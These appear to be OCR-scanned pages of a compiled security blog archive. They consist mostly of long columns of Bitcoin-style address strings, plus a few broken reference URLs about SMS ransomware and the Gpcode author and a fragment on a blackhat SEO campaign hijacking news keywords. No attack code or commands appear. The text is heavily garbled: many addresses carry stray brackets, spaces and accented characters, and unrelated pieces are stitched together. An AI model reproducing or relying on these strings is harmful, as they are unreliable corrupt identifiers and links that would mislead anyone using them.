1Kq4RwrSSSoiXXTA9PHtx6u9rAF MtUY Xu 
1Kq4ZMKHJquuxh2WVNAvSkYLULJFT 7GyHd 
1Kq5R6KhApqrMQKUbkant7gL2XGcFJjW2B 
1Kq6xPvBsmLkK8]pB7ep4sSa8qHva7zqn4 
LKQBkFINAfZdAJjKLHvWKdmLi66MEd7Ceq 
1KQbMu7QRUWCxLRVfGLkjRGUPhStuj4WVs 
1KqcLtGNo1b8M7nVCY8zmxN1KSHdsmyFnM 
1KqCowWDWe6tjLa3Rm7szp5qKCHsg8QD542j 
1KqcuAzctocZfERJnQcJSLd7Y84nCBDpBK 
1KqDNa5w8YjDMTQ7YmrSatZszzkNNwtcym 
1KqGq2igc692sjMbBJgLznNxm1ZYC4CeK1 
LKQgYxFwWGt3EbDUNNCmJDJWXYZVpQmPhtx 
LKQHKDBhZ9TzxXifkMnVdLrdbFBFagzPa66 
1KQhxdr2rfX1YBYnRB5uB23LzXdrPE3r7a 
1Kgi6LZKBsZ7grdc32pkWYYvvvpgbCjeb3 
1KQiIDUMNMdoRFjsNsHTSKNixgW953xqHM8 
LKQiLCYYOEYUA3909vfM5ULBeZHu9HUNtd 
1KQMz6VEaaYtjP66B3bsiwd5kg4LrKn6Lm 
1Kqqni5ndd6uKT 7v86YX7DTZx7EgkmhMPy 
1KQrmjafzgZNEVksVqdgd3eByfdfAVglW5 
1LKQRsoHtrouEYiie8eaZVd112pA3uybG7R 
25660 


LKQST52ihytJ5WiEScv9Vf9vd3DMDQ5vUc 
1KQt9sj8fhUYdjEuDv3QCTaujrZGcMvW6Y 
1KqTCxtgrHx54542tNwYfkKoqEgHz8jnKwE 
1KqtgMs2EgWFFqdbwgN983quwitzZdKcjJi 
1KQU7eJ8wVZNAUYV7xYk7Q8ApQg9Y98LyH 
1KqUGT2vbsBscxtzBbLfaZDwuq38Xcj6k 
1KqV1cVPHZZVwT4Kk3zTx84miGpD5vemK8 
LKqWwD29ixXCJUVgWPXyzWDaHN7LUnchyYP4 
1KQwDvy6xCeigjxAhLNQleHYhMcbtCCZqw 
LKQWWGZXbAZ8463T9R85Mvpdwd5tgVjEW4L 
1Kqx1qhxRScrmmStEjy8qjB7nEcFDWHEK8 
1LKQy3B6JtQv3gqfnPTh)JqjxL6AL4jabB72 
1KqY 7V2geHBp9AjbAzfio8 7 CKGgRWHHUuK 
LKqYQcZ72d5tLhvVStvxSc6CpMvcbUyrMn 
1KQYXB6XWvpMsze7pVn4S5EaQGKp4VeLzF 
1KQZMrCS5aD1HC92ph3Q2a8HGaMguNC2XF 
LKQzmrmwTXiKXjffmXzwi4z8 pEqncRcGj7 
1Kr2CHBNHFJjE7V4vGiDYryEmx2ux4kb5ge 
1Kr3bsZhbR6pdd9R33MUHDhZgc15kdFONX 
1KR4QSGbTQDFZJQDvPGqMYvbjjU5hc50FL 
1Kr5K9FHZGNawpsxxMZU8qAQaAt9i5zukKj 
1Kr8QT11AZA894kPE]XpjpgCriScEEAdK 
1LKRBQdvjJjRVBXQ8WkW86CcxxhK8CxKY9dG 
1KrcFkKLGFbZkD49zw3hoisZx6tQUxY7Lia 
1KrdTjfmFn6Lfd6QNsxmpXcptgJTTGb1hQ 
1KRgwtuaLX7zifABDWnL3hjPbZaY36X6ab 
1KrhfQ3MmbHQXs7G8VyNVx31Wtp3SdolvxX 
1KrJdxjAomdqVm78WqRHuRDw2tPe3ytjPk 
1KRnN6NcowEei8dis751WFCiwkjiBJ3KBoT 
1KRN8FubZpfgSpt1AScF98YtdnMCwQ7CSD 
1LKrNfV27wejQ9zVZkLRR2jCXUBHXrkz5rh 
LKRQFNy2pSzA4W4dVz2CxTwuo8LkALqcxw 
1KrRJXcXhhvYNnLmYEjAsnozRSye8bKvxa 
1KrrtQcySQvwuDewPMBk4T]vqXMVLi2aqY 
1KrSVvLqoP91N37PGcmjmHmQwB3Uz6td5W 
25661 


1KrSxe75A2E8MhAR3d7DtiHFHa9afWUm7s 
1LKrViMAhzaSjmbXMSVdjKzaMZMcphM6édcxX 
1KrXdecUiUmMEWuL4bvvjMeZBzzqwyL9Dow 
1KRZaGqeB2EX6QtVX5uSdc1jDWDnnatTXxix 
1Ks25EqxQ8A26TLjo9X55PMFxiMsQs2jTo 
1KS4qZdB9ISRF5XrDoBpYT54dK6U04GTmvV 
1LKs5EbjcNszGXFg11j5mUAgSf7GjXde2dF 
1Ks5hVz1jRXZ19RBT2iW2wzSer6tS2D1EP 
1Ks5j89CvVHNbZJ5DgL6PugM5dxQ2AAX31b 
1Ks7bvzxngeMX8wjx97AntAsFAkieaakvM 
1KSA6rGVBgt85wd9YJgrwUwWw299tLzGHe 
1KsCqinj58bgz9MPPXNX89XX5gP7pn2MBU 
1KSdR13E7fmuV5fVempetP7nijAuT9D4kKt 
LKSHwWjEPKbhQvV1gAqf4yh8g56u9eV8hGp 
LKSjdj4VVQQ2zYnS7VvMBoUJqjVkxCeGRcZ 
1KSjMeSvZMXGQZkT388gqJd7MEudXovZNZ 
1KSJu2KRyPTL6XRdEewn1Uy3tdR9nfzFcF 
1KsJWvbnXydskYTCzYPbUg4eVzQLiTe7Yt 
1KSKegDGoHhREONayJVME9Q9QhubnwGRf4 
1KSMU3pDxhxTPqQPajAKzkdeT5ruxfg5ih 
LKSNWE5SVjFa2GoQcjyhUZUL37Viw2Fz4d 
LKspmY9wh71YrhXVFWNS8m4zMKoxex7EZZ 
1KssCK2RXVgesmMtpHENf253Gm6Riof2AC 
1KSUv2kfRev4Ed3TyuSGmPaG73iHdtq4Xx8 
LKsyFBC1RnxqvfZJjELON2shUA2b6pjpu8s 
LKT2ByCyP91lingozh7fmorrJ11Zcsy4abg 
LKT2ZMzjiQ6kK8NiIZNQVJwmw2qkKtGcD8qdQ 
1LKt42sFr1kP2UjnAMN9YhvRrvgYRQUraQk 
1Ktbtf2qbtatBPPu3LaWZt83Lc1X1t1QfV 
1LKtBx2Na8a7Cy48CAMTUAD93j7CeSuttYv 
1KTc95j LhwnToZ3RhxZ5f7FqxbKDqdrFFe 
1KtdaifBDBqe6QjuVvq9xY87MCBzwfgidC 
1KTDMRsJQponUP26zbEdUVVjtmwHix6444 
1LKTdwmNZ3G34TLjr2JvxpxNu6GQyqSjwVa 
1Kte7VAfPhvj5BxS9Yom6Bq83p5CFUXgB 
25662 


. http://www.symantec.com/connect/blogs/layers-trojanransompage 
. http://ddanchev. blogspot .com/2009/04/confickers-scarewarefake-security.htm 


. http: //ddanchev.blogspot .com/2009/08/6th- sms-ransomware-variant-offered-for.htm 
. http: //ddanchev.blogspot .com/2009/07/5th- sms-ransomware-variant-offered-for.htm 


_ http: //ddanchev. blogspot . com/2009/07/4th- sms-ransomware-var iant-of fered-for .html 
_ http: //ddanchev. blogspot . com/2009/05/3rd- sms-ransomware-variant-offered-for -htm] 
_ http: //ddanchev blogspot . com/2009/05/sms-ransomware-source-code-now-of fered .html 
_ http: //blogs.zdnet . com/security/7p=3197 

. http: //ddanchev. blogspot . com/2008/06/whos-behind-gpcode-ransomware . html 

12. http: //ddanchev. blogspot . com/2008/09/identifying-gpcode-ransomware-author . htm] 
13. http: //ddanchev. blogspot . com/ 
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5.9.4 News Items Themed Blackhat SEO Campaign Still Active (2009-09-07 22:42) 


wWOWebSpace.com cielo hota tog | frum | Getrg | Heehesing | coerhost | resort abuse 


Piet iotot Steed x ThemZa_ Download Free Templates 
mete \ Bitocrrict — @Vsuntm noodle 
fox 25 news 


fox 25 news, 
illinois lottery 
results, mark 


belling brad pitt dead 


&) 


jamie lynn 

siegler de paris 
eat soup 

DS3 NEWS ho 


According to a [1]blog post at PandaLabs, a massive and very persistent blackhat SEO 
campaign exclusively hijacking "hot BBC and CNN news" related keywords has once again 
popped-up on their radars. [2]The campaign itself has been active since April, when | last 
analyzed it. 


What has changed? 
2569 


LKTEpXCxnUyjnCyKDrADziR75bV3LijPgq 
LKTFAWixd4JycK9i3NKh2i96W6CZU70ROR 
1KTf] 76yPnfF1XNoUZGaAWKEjNkPWWys39 
LKTfqgS8JUMZrn8AWcTEBaadNuVju9qL8pw 
LKTFZ4YjdAQrWuZX4R6yV5WL8TdgTpxa8T 
1KtGACqGcGptYrxXUJ3DoHuPQU/7tS1tagw7 
1KTGFbcReAgpzyTdpNK9Homu9nwhfjCUMq 
1Ktgp4QnvUsSU57GA6b1RVMQf8hBZADDW2 
1LKTMt4hwocoUsrieEBy8yyUvE|PfR7y26 
1KTnsepZTgoNAX6bdbRhZomxX8tDPUGiw1p 
1KtoKjyUHYpGzyYfbzeFyZ9Q55vSxMsbtWo 
1LKtPALy1pCmsqpjbcJM5PRJfWw2UG2cKm6 
LKtSw5YYJc4AzxWXhLAAbaChax2XLws8Ar 
1LKTtxD32yAMZHSEJgE7KvP2BU5Ujmpueth 
1LKtuNXtyi9JkzidGjaupbQRNTse66T8ZXE 
1KtzrqD3EQX6Q3AaKRA5pqrAWxY3s3LUMS 
1Ku4XKeVt7HpjiDc3d5KWKKniaZBYSLyzM 
1Ku5jzTxX6juWTEgYCh1C51VPpReqRsvNc 
1KU7sVswcmo81Vm7HbmcRwxZQ5fzNf43vD 
1LkU8Cbpk2xv9C9rGY1AeRGALU35G4f8g3 
1Kuac65Szo7gsyzleZwUEmuWcYwya32ugw 
1KuAPcR4vFopaJtvsWEyt6qVo69NgsDhc3 
1LKUB2V2ieimhd5FwiqEJE8foHDQRMWP7aw 
1KUCZgZoWNgCP3tD9LRMBHU3cxT84EPPjr 
1LKUDMmooHjbUQ2JBjN9Jfurn4dvKBVsMbjtM 
1LKUfvK8AQY1KVW3xtRFbhNhZgXUxGTQb4U 
1LKUH60LBVCetpoWVTw2wwSJcs3d22TqnRk 
LKUHkRJjz9BYINEMnEphVokCffvRcc5YGg 
1LKUIGZ2xxS7kZiREqjMJCXLJrB9c6TLuXc 
1KUJDFMsDRf9L5H2wznvqwsKkWbAFd7MkKi 
1LKuJmMR4kP2TRrSL2qY64ztJnkSty21BvTY 
1LKUkjSXv2njDHW7FJfADNTRLQLbwHHZZF8 
1KUKkw1x7NQ4csng63aN9fXg5tMphS2jq9 
LKUMLbhpkkK9zfL5mhViG5TGfbdk7t9h1KW 
1LKUnkKjidTw8nnVZtF 623ZH6zmj 7b4K3wB 


25663 


1KUqgCmBfédhtpmXsLLZoNvMX6kKr95Dm8X 
1KuqgGiWxsGFgiRaLaus47bKKNAPQ50FnMN 
1KURESkf8kUkJdG9qH1j6N7RmbWjf7Y8az 
1KuRvG1SFgcJZug2ZAqDHL464bvMLrBVyU 
1KuSZBZXAr42aSY9KDr7YG1qkKe8AVHRURG 
1KUtzKHrUpWqHbDPzhnMqM7EA66NxAhE7q 
1LKUUHTGBZn8zZA9wWBSUWMwRq7GXXkNnuEQ 
LKUwiLRXXR7Pg69gQf1QkWFKL512mMQBQL)j 
1KUy1siEnrvaBeR1Xg6cZWwD)fpgd53FPK 
LKV4MJZyGnjm9yo6nVvftVTAr4MrN1R5qYt 
1KV5muzG7YZt5nVZjQerwmEgmn9BmESyCT 
1KV5Vs5erFkYNZkeaGg722jiRNL4ma3Dja 
1KV6LstVPUPMS6AKzw8ezzHM TrJ2QVYHbA 
1KV6x4bCUHRa7BN5cDbPNcdRejUSgU5ud2 
1LKV8VAG2LxjAQcrGcQvBnDdh1BtUx9vr7K 
1LKVEpsSYksfe2XcrkSoH6ss6yMKbBT1LEWj 
LKvFVpGntfWuVK12HR29bUwm631dq9wXhb 
lKvgvw86CZTFcNcjCAWeDLMDUsnqLg8gA]J 
1Lkvh7zVRrucjpEMso52Z66wKcoxUgbDSK 
1LKvH883aGn3xX2TU6Bi6cPxySggnuLzubs 
1KVJapg57CPG7cpXYjz6X1Pf4RUjUz3Cgc 
LKVk5aRA5Vrrjyuh3C1li7aGpCFBujJv7AM 
1KvVNRkwB8fdbeErywnAVcTUrLrxXMVDFMv8 
1KvpApbautq6nTVLuiKcK56Aqi20zzssDP 
1KvqosZ3B996QwPg3w51eCZvorj5gVUFet 
1KvrSCsfgVjcqrwqEZeYe6Fwep9236Vnyp 
1KvSjzJ5ARRgpy6r8ZmgP]uk234MAbtw4H 
1KvskP2YoYNjTZJINFDSPTJcFZz4RgiPkYR 
LKVWCv8eQcx8uuQHFqhmk6ixme5o0A8XkKjt 
1KvwviRjgXJc38SUuvt22zZQ1xKSFklw5qd 
LKvxVYWEs1FEWUKH8pDLM7X6hj4fu92bLB 
1LKVxYujzDjmmEpwcA9AW2 6fSfp Yubt8BFW 
1KVy4ADmBt52JgQnrKEui7D9Ka2J6XsxXir 
lKvydr1MQoVkCf4QsLjV5DmwsQAugWTyeR 
1KVyfubKUhibpzivPaNr9wGzjHajFaJhod 
25664 


LKVYL6nV9IDqrwWKpB3qhCpb6A4fBL4GtdSg 
lkvyWaUXgYbTpuARrIM4PrmCgMvErmz5x 
LKw5YDKbRTNTLnDgYj 7wZ1wwagqhL5G7Hwz 
LKwW6LGEt]GrdutmguACmwqkoCN7JMcpy7e 
1Kw8Vi9RFCgkkTPmnCgAjhQirlgGsTV55f 
1Kw8zY8pnFbxqsUSpBzJpRNWAnY19tHyYA 
1LKwBRdRtmh9SXQ1gbfKvgG Xruy96KHhf5E 
LKWcnPwLrhJPYFg9tmkMkG2c)JKojZwDKxd 
LKwFB4UNPC4bBN4LWcnxYPNuBLhpxK4xLB 
L1KwGGgtq2AQALTMiCLCbyTfxLbAzMd29xc 
1KWGHwjJb4rFhNomLzjPP6Faj4TTFRpA3K1 
1Kwil21DmXfwWb2cCqbzYM8UNXkBrbX5J7 
1LKWj75eSxAh9SucDoigEN9ONMBBix8CrkKXc 
LKWjbt7QRzZBZXwqxuTcFWnétAyZe69ipCT 
LKWNb1J5QBFa3CZt4yaLMQzReE9KpZRRAm 
LKWnUaxjYvfcyKkafX9EvXCrNpAiF6hpcT 
1KWpdwfhgQKaqr17FbD6xPGqpYwvkZzjbKg 
1KWrwvmHa5m6v4xsnxTK98s75MNAcbCZ1q 
1KwsPUAfCiH8e4aLcwk8LifxcX8qyzm26Y 
LKwTJBPWvuJQpR96wWHnvIcAEvV38K3jGPT 
LKWtQHiJERLWugviwkKzjQ3qvkLvC9iDV6z 
LKwxitAXXtFFFS3XjulHp9CzkqQ3j5424Z 
LKWYikLLbDSVBXXTDmdGzzA2fpJWCijyqxN 
LKwYqCfQRbpbqHwsbWjhy37FFX6iktKoA7 
LKwYSJF5dQjbX9utehtMUZLybLuRqzLPZY 
1KwZoET1RTYFGBSDGus1x7aPKo5zZNbSZfG 
1kx143AxD5HFmMVESi2Xj6pi7dgT41lapr 
1LKx1T9JAOHFHESMTHVQXqjD6hviapel1YUW 
1KX2udX5zZU7AEHeQyN1u4JUSGub2xQpsDE 
LKX9bUjSINXmtYszS55smrhCffm7xmSGsn 
1Kx9SF8RWDPTitGsbHriFP65KgiMiYwz9L 
1KXakjKayzNscFucpQW8kGtQ977B5y5Y1E 
1KXBBdUj4jLTRUGdAJtvsZZLNZCPpxmCLn 
1KXcP2tGf8egvaqg TraUuojzZGDkqZnPYrU 
1KXDtsAg4Usu6Hv2TA71rjzYipVMTkdBt7 


25665 


1KxeXEpaWS6y7JPhS7KcS6NGpoL30RLHdY 
1Kxfc5dUISTXupCd9LRA1ExWp7AsM2pRA4 
1KXGqMuWiHwpous5DoiYkcpf3iUyraiYg7 
1KxhTvunmLG5NEAfonVx9MydeSdcucfg]j 
1KxJONGXToPrjAZLUZrr9evMoGvKHaRbgH 
1KXJzgdhc1RJbM9jhVonjrewgpstxVsDIE 
1LKXN9OR9IG89TAVaVeuREu2fW9kKWRfxuR1ZD 
1KXPAHNNvQCdm4JCenhkg2CZFJUxd6fBKo 
1KXq6KRUgflwtde9cnvnRADFqPZXBKuziw 
1KxQLwiAaK2PyKTCnW3wZVSb4qYLCCVhSz 
1KXRnYUQeYGNYUSpFxdBRs5F5mnCEgcmu4 
LKXRwyEPJ5CnYQ5j72HRxGmAjzZ5BGuFHfh 
1LKXtZjTZ8YrMQyyGoukyKzP8YtaZnh3YQE 
1KXuukEC7HpeKYhx3K5nzAJs9xYc36RtoE 
1KxvYUAwm]fnmcbahilo79BEgdazLUYHQQ 
1KxWvRoCLPioF3ZZ9zLonw6ZdyxBfk2bUX 
1KXX377Mi3Kq4rFBELEFTQNVV2QdMg54c3 
1KxyeoWNEPzw50F15FnrM2yU82G9b8w26a 
1KXyy5ASPtxykApkuKscd4PLDEUHGQKDSg 
1KxzGzV5 TwjuFGuiwwh84cPPwUoPoReoMh 
1lKy4nma2zLEBNqUD4q6LZeiWPK9FYcYJNr 
1LKY7mYugf3qd5w6GfuosYXeRAUVaP5Z2kWk 
1Ky8fCsCnE4kKr6sdaoZasy5kiBnWqQ1Zjo 
LKYBTnNUkwUg9JQLVW7RSbapLrYFHJzwtFU 
1KyD5Fnze2yY7qQqPwU2vc6djDZ4HPFhHUD 
LKYDD3MramLjz5p1W5Z3QapKovV28V7V1yj 
1KYe2R3TpHArwBhHLGQShxJpPDnRLwZv7i 
1KYebWBhPByD8C]JbqJEyPynKwCTCFb6fZb 
LKyEcj4kzyQAHY994heFCL48HGwZweAkFs 
1KYGesXZwsbN1BadzBsSqtV5uV7srikpoD 
1LKYGJXpHawbh4oF6RgVthmeYTLBXvhNjDA 
LKYHIL4DNKH95PncSuak3MVVqDC18ijEMm 
LKYHTZJEp1Zh6UAebRRyVRLV99AJBBPWkp 
LKYhv4cLXTYLOSJCISqCWR30PKVdXjTkKXB 
LKyMgFFdVawFuRiZG8QARfvBLkmDNRf30G 
25666 


1KyPBCxXYMk9WAQDr8m259jcGPbaCL5Pbxw 
1KyPrHiojoGLflfqQQFPKCBtFRtPxNkKDe 
1LKYQ7H1eZEBEdMA9kwpqtF1lvHQigjirQaA 
1LKyQxuY6GTpZrSkwdED1XqryU8SegNXxn7N 
1Kyrqk641TVjkQFqvpKxHdfBYoLDvjfcxXx 
1KySA1tTwxBPQ8Ed1XW5k759h6PbuHesrH 
1KytTloqbpCK22tQFiau9JuwQor6éK8wGGj 
1KyU3cZo3Kf1lo9LSxd9dXHwarfvTRLHWCx 
1LKyviJmryCCh903P5hKDaB5CmYWua2v3cc 
LKYWCyKeKx2tTXBi8yu7338GMdQCM/7cP21 
1KyXPSN1TMUfhUlLiImpMmk5mP1xVnnajkd4 
1LKYxZmDqtdMG89usvuqC8QyEbxXxBL3mwVx 
1KZ1ZZ1gQxHi5jrmXUkXiVXhgrqWdVRDqs 
1Kz3cKnjgyVqYkf1s7dtff3978raTU13Pv 
1KZ3x1SiTyWhP717Tnx7naNSU1lodj51w72 
1LKZ5wNNQsPmwGb9OtFFaju5ZiAEXmEAGcrH 
1KZ9ghcJfexGr7NNZRCJGYqKoth2cBXkev 
1KZ9swBRZ1sMCRLdCQgFqTkfXavDckRRAY 
1KZbqczdMsCG5yjJtcdJLZ2RxqS5MNGASG 
1KzdKRbMKWDVFkKQCYMf2Grjqfr3DzaXXNF 
1KZE37QYmhoFqemHZ1ty5XFnjATgtSJKxB 
1KzenP4YHe9iIRUWFt9Y L5s8tjindqyWXWr 
1KZHfDDpPs9f11bXTU9yxu67E3Yrh5THZE 
1KzZHk4u2ZRrBHdMQTosDhiiCuAfawUAI1rR 
1LKzjUSfFEDIxQhQqRmZgtix2LWJwLtDw35F 
1KZKZSRPepEZHwY2ZNrDyVVy2ZQ4DKEon4 
1KZm4rLQX7DNAZSZUCAYJhdiF4xXtfLSvuw 
1KzpsgPFKmSjrYCNu2qNuBmbMoD9kVT50S 
1KzrdjHpYcbRLoX2YfwrufLYfaJzg4ymkv 
1KZrtYpzGc6oK5X9NzZkZAVFHDby58ZDU1N 
1KZU5nETgieseSuhwwH]JsbiYbAPVnSuWdh 
1KZU8mmMmEfqZcPtxRV6YSPHg8k2]4m4QUHd 
1KZVduNVbcGxnu3709pmnutkKpKx5XvrqQ 
1LKZVLJcZky4wDjhCkKjJiS8HnxurGusjCnG 
1KZwbFxj66N8w2bNbw638wxPvwHmeg4CER 
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1KzxAaLLWwMDJUx33sTq5PlwoWdi3eLWVf 
1KzXwwRikK1zkyY8JnEpT5b3uQewYiSoqJm 
1KZzZPRJZeQNo1zFprZXWZ12GJN3KE4cQwq 
1L14dmMiYCopB3Gv8jWh1MUMw7ilsXnmnb 
1L159jjuQORxXLDSFHzq3uZXyQg1ZKr6er 
1LL18pTfWVSJclgEoctuysF8mgpxXhjw3mc2 
1L1Auz8gdzgrtcA2r6ZLUJneQpmhi4QupQ 
LLLHwW3E1WXY3h2KRLbqgsSyNZv6UvwhMxb 
1L1.KpambztkKMNoZdW7QmSKm7mNGVoHYLFN 
LL1IRy3NjV29r1z61Fa9jeTLAU8YnHsu4B8 
1LL1tKQYXvoaJZHCfZBRZdDZ2K4qUAVmsTn 
1L1XcqqcboWJJxcax7X16KH6VvU91LV4W9OW 
1L1xVgDnRxjyurETBDcwRe3cc7B6b65YhE 
1L23Cg4w1u3EQoL9vkLpzSttmilmrpGgAB 
1L2AUDGXSUgsZJzqF5UakApPnuxXbhJPXYm 
1L2Es23CWACPND4PLINkYF1UReerigSVTN 
1LL2Hdt3WYwVrRHSGosjfgMSPjqCLwBnpTX 
LL2iTCmr27xtsJcnfGnRqcKo56R1in1PsSf 
1L2KyLQoM1ladqHu4du8kcRyZXJ3fpDr8MC 
LL2ZTNYPbvHbcQBmd1U2WJZSSdrQmLAvSVB 
1L2vlLUbSQCEXeFyMDpWCsqiAPwjp2JMukn 
LL2ygtaGYWh1U8bduMi3kKtdobmHT3rjJbnS 
1L31Unk4yqoseAUyxNhNXHfDfCmsrsYqy3 
1LL3anydkFTdTm1oF9K1vABH6CRG4aP7JsY 
1L3CeEXVHdgPso7WJdfGwr9CLmZ9pRcZPf 
1L3e3)7mfPCkU7LEbdqKkjJenSixfn5NrL7 
LL3kEqZZzhXcxn1Cq5YAaWyG5t2q8nn9eR 
LL30WgqRcqPsNWobVeWCe3mDnhg3XLL23Xy 
1L3R1uVPK3i6RTEVy1Jdj1j44eWRde5xx9 
1LL3uTMC7L3qnUoJQFoyptoAG94P5YaaykG 
1L3vb1RNkKFvbykHHBtS3x8ucs6fNzzDGY 
LL3WQQadkgqGS5asi5hLwnvcmATep8Sd78V 
1L3xUx6BRtk5vXwJA9pNzz3dbvntXzFddu 
1L45ZrH1KMTk7YnkKXvvCmXEEuuces8Y2Ud 
1L491fMneXR8JNdoCRHgyuTHtru4r6HZdP 
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1L4a6FDLxrXyhDcUCmeudJArN81YYj92Eq 
LL4c4jyhcqLVEgvVAtbvjn4bLoGsjvj7QW 
1L4DuwPG4z1XC6cKQWjj574zgjg5MTofa 
LL4fmMYBwMVa27Sq5Qok8nM2tAg4GKnkiHh 
1L4gKhtdnc33Nt4pBCxjdUxAr2Gey4XCxs 
1L4m7z1YYLCZZnfeHtiY¥mu4QDTvtdyYstnt 
1L4mmTVAzfPtkpCzBJYxC5YgKFr8EiVv2U 
1L4owv3YSB46qJStTtpsBgGmKUufle6iEa 
1L4PgP5n16WsX97LsMGoGtG9wycRbdhRKL 
1L4RD2iLb6GztbQo2dhBcsyLzmutu2gFGL 
LL4ti2kwyYqyUdvqdLL2kNMtfyjwR2RyHg 
1LL4U8qocLy78jk7WAf5JYy9xpBJzUrTWyG 
1L4vuxfGU8m3QksAGrhpxXfVeWyQuHzySgf 
LL4VWSUeWT88KqTZoSEMyuKxHTApcaWZSj 
1L4YeYtubnK9YUUQDqQa4Urr85MtdLU9ATN 
LL4ypAukN5qmh4B8f6jVE5xu7yiUBveGrf 
1L557z8pDbrdRpvF1TYoodrL6epHraP4cS 
1L57nT TyWUVywQpn5YUAb3Ad6U8VCgjtP5m 
1L5c4F8aTGL3xAYMofwmGYryM6P5V3Gkf] 
1L5FXs3d5sexeMXYPAGSNWWHni9y29UZWE 
1L5JDT9ORVUE6RWZ64KntW2CDamCCwEK2rq 
1L5k9Rd2ERVVMVkhq4HuTWLp2361iGZT6A 
1L5mYPfBcwy7ESAyCnmvvxBYzk9SuJQbsN 
LL5PYiTRaWivrWH1EKNGVG1z44vXMXgDQb 
LL5TPCpjjfHRqMwaqsejn5xu3HQd7wi2CP 
1L5WXztoxXj9RxrT75F67U5SCKN9vqmBEp1 
1L5XRssjmfG3Y6qG3gxm296HTs9dRa8MLe 
1L5yrY6a69y2z0DWr94CcytoBtD41Ykc54 
1L5zotC5scLp7tJxkk8w8HVU6qGKppMKn 
1L679jjvtkC9Eopg9F7XyTkypBMFpheom| 
1L6aUujqmgEaFbDQoKT8Ecb3gzFvZDsUW1 
1LL6bdt6vr4FFj1Lh22FrrZTHgeQFMhHPMmL2 
LL6BSachpAwYmE4inWe2jn2Rmx7JTWmm9s 
1L6cZY8yvi7KezQ4yDhWbUZJ6rhHqeieAA 
1L6HQ5DMzKNu6zBHtEvGWtMsF2ZaPbW2zF3 
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1L6k65vBYCBNbVEZFJNJLTrfkjUQSDVbAK 
LL6KVFCNMP9x2L6Ji7ysiT3jNczzbbQR4W 
LLONKUnvyJ8ckL6zvVFMkRRgEDrTegBkRt 
LL6nNWjJRMGcKbeoUmelrQ1imp2c6ZH3kVS9 
1L60Ezhkurz2jc2 3wKEREMNSFewgU8eT YF 
LL6QNA76ntWDmqmiaJMjpTtNZVP6u9SAIr 
LLOQzxt34ygcYt2MFaFwGuJbCZAA6wM Yon 
LL6rVUfvfcjWadhmPH559ftBUUnrjzMF3X 
1L6S3qRVeQLnoZ63VvHqtnL6WrAvE13Y2G 
1L6zqba2e6wHmxz8dPBEaSniGyZtmLpCGT 
1LL6ZQUtDN6VYsfw9xv5wBp24HCgm1UyLXxXg 
1L72MuvESscAHxP6K1Pr6XggNmH74DCLqQ 
1L77fW34nS60w7jJZD2xAsPovZsfzYQZE2 
1L790ggrMGE3XAyHnLhbNg78zW6VGZDUm4 
1LL7BisPWjZQ7hvxXiirDmgydc6zKtFPXANW 
1L7Dq4cMzvVpGZCBGK9voo19BTF1eYHAJb 
1L7E23MQn4Bn53Y7GjahgpSDYLCpkT 7hhU 
1L7endDr93VwomPzbTRNvxErLUUwWTHWQ7k 
1LL7ftERQ5g5GXwSsVz8Ap4Kivx8quibo5} 
LL7HUNSmHmGh6fL8VZRNtwuqwC3TyyNuE5 
1L7ieDF5a5J13NV9EXCF4sRagiaeUoMtuK 
1L7ND1zQnCpzYa8JTWKi7frxxEbs8dmtZz 
1L7p11CTDb7eC)7Kd7yCB8g14Y7qg1lmhmZ 
1L7PRXaUm9cPjkAC]sZxb3Yxc967f61Sgs 
1L7rZac1MAcqDAtAUcU4iIRHQM9GUab2WXf 
1LL7S2ncJPWgtJKzS9rB9gfgD1n55X2tq9w 
1L7UogRgjmb6T2vVIWKE3drpGy1A76rr8B1 
1L7WevwfDj7AzEXfi9j LBbAYyCZhjKLvBv 
1L7xBY9uq22V3UHtEdPp3DCbWL45TYE6XW 
1L7Z3BoVLrmGcz9pLjtDA3007gAdmbf8iS 
1L83502JXwMdftcR9rBDQdgGrcs4ntJY9K 
1L85xt2BvkQHg6TurYZ1ot5EGxJtg5PCRX 
LL86YJQKHXAFK7GWb48Sk3Yiiy2Q9SKJYN 
1L8aL3D8ZXksgmZwAqQmPpkhpEdrdSbxc2 
1L8ar8xZrwDTmkg5ELfjsLVPDVoyNUFU8R 
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1L8ERLXQXPB98aBhxfK37P1VaomWbVzGKu 
1L8FA4RBCM3N2C4iyoWtaVmnC9fhHJMSDv 
1LL8fZCOVVNLExKyum6KmPbqoYpDb8&mMm9tJa 
LL8hffXaiKAZW8jEj6dRYUNE2HnNCBKKeL8 
1L8jUcLHBRRwWV2cBv5UJugZCsT4oyk83c6 
1L8Ksxr3zYXncLPZxFEHj2F8GZLhnjfPeD 
1L80dZd1vtsRnaaQbyQtEhBPXnibq7gdcn 
1L8RaqYHuD9bSMTWnuD8w5zg9maRisDBSA 
1L8rcKo7HF7vT4kbkheJcxaNoV3Dyigc8Q 
1L8RqfbXH5RJGMC8aSgAUPvsMWjtFm2DF3 
1L8SZNLPRSXHCKhYg3PXizmTDjYPVUxXnV 
1L8tbbo9a8dCVm1lesxFE1S3akhnbenUv4u 
1L8TG2By6K567SM9LA5XB4MnjEbk1lw7quX 
1L8TW7SPm6aMWagfPvN8cAAQmbspjjJUzdS 
LL8vgbXV2nVIToFrjsfx7mMeDUc9IaHUGitQ9 
1LL8y84mTUrFtoCoVkiGUgD4LbjkD1lejiCa 
1L967RLpPRWKbYSvQREwu73EumQrmvpSxfZ 
LLOOBMUVy4KMcjKiDr9F47WHsFLoazAFaV 
1L9aFsVfYCT8scUU8bGoiIXDagFa2K2FCsg 
1L9Dbpm8sdYMnCpkTu84PruPcWhkMuLm]p 
LL9kq2tNW1PgTxAq4VYmWKEn4zBbQ6XVh8 
LLOpvXN3t6nNGgCwHP4bWkaymSorvVANpv 
LLOQHLEGTaweKw8R1JF6CoF9u5zKjLdBuR 
1L9sL2j398YAcsLdvJGNTHf1leMPtwEifL9 
1L9ucTcoT1A3eqxC37ZrvefhdH1CGMzuNk 
1L9xUM7 1nuug8sqscbZRoAVVGU 1JqQs6Pz 
LLalfSrjNRXXLjECD1tk2aWt1lTy2w6pHQb 
LLA4qTLi2bPVWMPUWYMvxzFifkbfeZhqvm 
1La814VPKdTLMPG5juuYefWvANdtXZagpx 
1LLaA5nj5H66ERHyYQgSHHVLKYYmapn53xq9 
LLAdSWFkKNu8rfd81CtjJzmhVNYVoxj4i3Bs 
LLAEmMbXV6NqgPxnU7RhTppYsvFZd2AuJqvk 
LLAFUdcd8Cv6MfHVSt4kxEyTCT92sjXkRC 
LLAHSZKTV5MguS24kU1bgRUaDBbdjNjmFZ 
LLailgh2CpRcnSXRb5fn7PwgPZ6t9VF8HM 
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LLAjJ4UFZXRPyS4vsm6fwLG6aZDkKXHX5dzh 
